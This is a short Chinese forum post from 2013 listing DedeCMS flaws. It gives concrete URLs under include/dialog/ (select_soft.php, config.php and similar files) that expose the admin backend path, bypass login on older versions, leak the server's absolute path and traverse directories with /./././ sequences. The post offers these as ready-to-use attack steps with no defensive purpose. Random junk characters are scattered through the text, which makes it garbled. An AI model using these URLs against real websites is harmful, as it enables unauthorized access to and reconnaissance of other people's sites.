1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
7 d- Z* D9 U& x7 e+ v: t* M3 h( d5 c; T3 A
员帐号,新版本的就直接转向了后台.
2 B- w3 J+ v$ x4 R; Q
" k6 r- T- i$ e* t) o" W9 l2.include/dialog/config.php会爆出后台管理路径$ B; \/ m! D) B7 S
2 |& m5 s; Y' W% z
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
2 p% G# G6 e, o0 o" K) u5 d
; E. ?0 A: O( h4 a; ]4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径./ {0 A1 h& M' _, V& a
; I. S1 N* T( j* K
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
/ P- j# X7 w, s L+ A7 R. x
# [& J( X. W3 w" k2 X到根目录去.不过这些版本的访问地址有些不同.
% i3 |) z$ c; E地址为require/dialog/select_soft.php?activepath=/././././././././
+ N" b* i) m8 i5 Z- ^* {* w& \% f. y! H. z+ [; C( |& m
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..$ [1 q9 F7 G8 r1 Z$ |
存在相同问题的文件还有
- ` j. Q+ i" v0 [$ oinclude\dialog\select_images.php
6 H6 J* e4 I v* yinclude\dialog\select_media.php, o9 f) ^% @- a( K& H6 _
include\dialog\select_templets.php
& x7 m, \8 m8 ~" X9 \' c# J |
发表于 2013-4-16 16:50:43
收藏
支持
反对